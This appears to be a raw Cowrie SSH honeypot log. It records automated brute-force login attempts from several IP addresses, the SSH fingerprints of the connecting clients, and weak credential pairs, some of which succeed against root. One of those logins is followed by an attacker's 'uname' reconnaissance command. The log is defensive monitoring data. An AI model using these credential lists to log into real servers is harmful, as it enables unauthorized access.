{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:51:25.961461Z","src_ip":"77.83.240.46","session":"b216fe404a4a"}
{"eventid":"cowrie.login.failed","username":"asterisk","password":"asterisk","message":"login attempt [asterisk/asterisk] failed","sensor":"my-vps","timestamp":"2025-08-28T01:51:26.026099Z","src_ip":"77.83.240.46","session":"b216fe404a4a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:51:27.041091Z","src_ip":"77.83.240.46","session":"b216fe404a4a"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":59240,"dst_ip":"1.2.3.4","dst_port":22,"session":"11198896a434","protocol":"ssh","message":"New connection: 194.233.79.134:59240 (1.2.3.4:22) [session: 11198896a434]","sensor":"my-vps","timestamp":"2025-08-28T01:51:29.144586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:51:29.256781Z","src_ip":"194.233.79.134","session":"11198896a434"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:51:30.913469Z","src_ip":"194.233.79.134","session":"11198896a434"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T01:51:32.451861Z","src_ip":"194.233.79.134","session":"11198896a434"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:51:34.343831Z","src_ip":"194.233.79.134","session":"11198896a434"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":5814,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ef13bf18d09","protocol":"ssh","message":"New connection: 80.94.95.15:5814 (1.2.3.4:22) [session: 4ef13bf18d09]","sensor":"my-vps","timestamp":"2025-08-28T01:51:47.382549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:51:47.383481Z","src_ip":"80.94.95.15","session":"4ef13bf18d09"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:51:47.440211Z","src_ip":"80.94.95.15","session":"4ef13bf18d09"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T01:51:47.728338Z","src_ip":"80.94.95.15","session":"4ef13bf18d09"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:51:48.782296Z","src_ip":"80.94.95.15","session":"4ef13bf18d09"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34202,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b487014f178","protocol":"ssh","message":"New connection: 194.233.79.134:34202 (1.2.3.4:22) [session: 4b487014f178]","sensor":"my-vps","timestamp":"2025-08-28T01:53:11.927056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:53:12.567766Z","src_ip":"194.233.79.134","session":"4b487014f178"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:53:12.568443Z","src_ip":"194.233.79.134","session":"4b487014f178"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:53:15.322535Z","src_ip":"194.233.79.134","session":"4b487014f178"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:53:15.849964Z","src_ip":"194.233.79.134","session":"4b487014f178"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:53:15.851401Z","src_ip":"194.233.79.134","session":"4b487014f178"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:53:16.095810Z","src_ip":"194.233.79.134","session":"4b487014f178"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:53:16.097041Z","src_ip":"194.233.79.134","session":"4b487014f178"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61128,"dst_ip":"1.2.3.4","dst_port":22,"session":"4de6a3142860","protocol":"ssh","message":"New connection: 217.72.205.35:61128 (1.2.3.4:22) [session: 4de6a3142860]","sensor":"my-vps","timestamp":"2025-08-28T01:53:34.218316Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:53:34.219578Z","src_ip":"217.72.205.35","session":"4de6a3142860"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52026,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe08ed2e592b","protocol":"ssh","message":"New connection: 212.227.235.229:52026 (1.2.3.4:22) [session: fe08ed2e592b]","sensor":"my-vps","timestamp":"2025-08-28T01:54:14.554220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:54:14.555742Z","src_ip":"212.227.235.229","session":"fe08ed2e592b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:54:14.659641Z","src_ip":"212.227.235.229","session":"fe08ed2e592b"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T01:54:15.079708Z","src_ip":"212.227.235.229","session":"fe08ed2e592b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:54:16.186977Z","src_ip":"212.227.235.229","session":"fe08ed2e592b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52990,"dst_ip":"1.2.3.4","dst_port":22,"session":"54f90cf54f0e","protocol":"ssh","message":"New connection: 212.227.235.229:52990 (1.2.3.4:22) [session: 54f90cf54f0e]","sensor":"my-vps","timestamp":"2025-08-28T01:54:32.675921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:54:32.676953Z","src_ip":"212.227.235.229","session":"54f90cf54f0e"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T01:54:32.765607Z","src_ip":"212.227.235.229","session":"54f90cf54f0e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","sensor":"my-vps","timestamp":"2025-08-28T01:54:32.945996Z","src_ip":"212.227.235.229","session":"54f90cf54f0e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:54:32.946854Z","src_ip":"212.227.235.229","session":"54f90cf54f0e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","sensor":"my-vps","timestamp":"2025-08-28T01:54:33.036389Z","src_ip":"212.227.235.229","session":"54f90cf54f0e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"02:43:f1:9f:93:15:69:05:d1:f2:ab:fc:84:49:ca:ba","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:54:33.036991Z","src_ip":"212.227.235.229","session":"54f90cf54f0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60058,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86c5a1ad2a9","protocol":"ssh","message":"New connection: 212.227.235.229:60058 (1.2.3.4:22) [session: f86c5a1ad2a9]","sensor":"my-vps","timestamp":"2025-08-28T01:54:41.536753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:54:41.537910Z","src_ip":"212.227.235.229","session":"f86c5a1ad2a9"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:54:41.743438Z","src_ip":"212.227.235.229","session":"f86c5a1ad2a9"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:54:42.364961Z","src_ip":"212.227.235.229","session":"f86c5a1ad2a9"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:54:42.676148Z","src_ip":"212.227.235.229","session":"54f90cf54f0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:54:42.853097Z","src_ip":"212.227.235.229","session":"f86c5a1ad2a9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:54:42.853912Z","src_ip":"212.227.235.229","session":"f86c5a1ad2a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:54:43.061095Z","src_ip":"212.227.235.229","session":"f86c5a1ad2a9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:54:43.062215Z","src_ip":"212.227.235.229","session":"f86c5a1ad2a9"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":59168,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44cc01a73fe","protocol":"ssh","message":"New connection: 194.233.79.134:59168 (1.2.3.4:22) [session: b44cc01a73fe]","sensor":"my-vps","timestamp":"2025-08-28T01:54:52.044721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:54:52.124402Z","src_ip":"194.233.79.134","session":"b44cc01a73fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:54:52.886865Z","src_ip":"194.233.79.134","session":"b44cc01a73fe"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:54:56.545472Z","src_ip":"194.233.79.134","session":"b44cc01a73fe"}
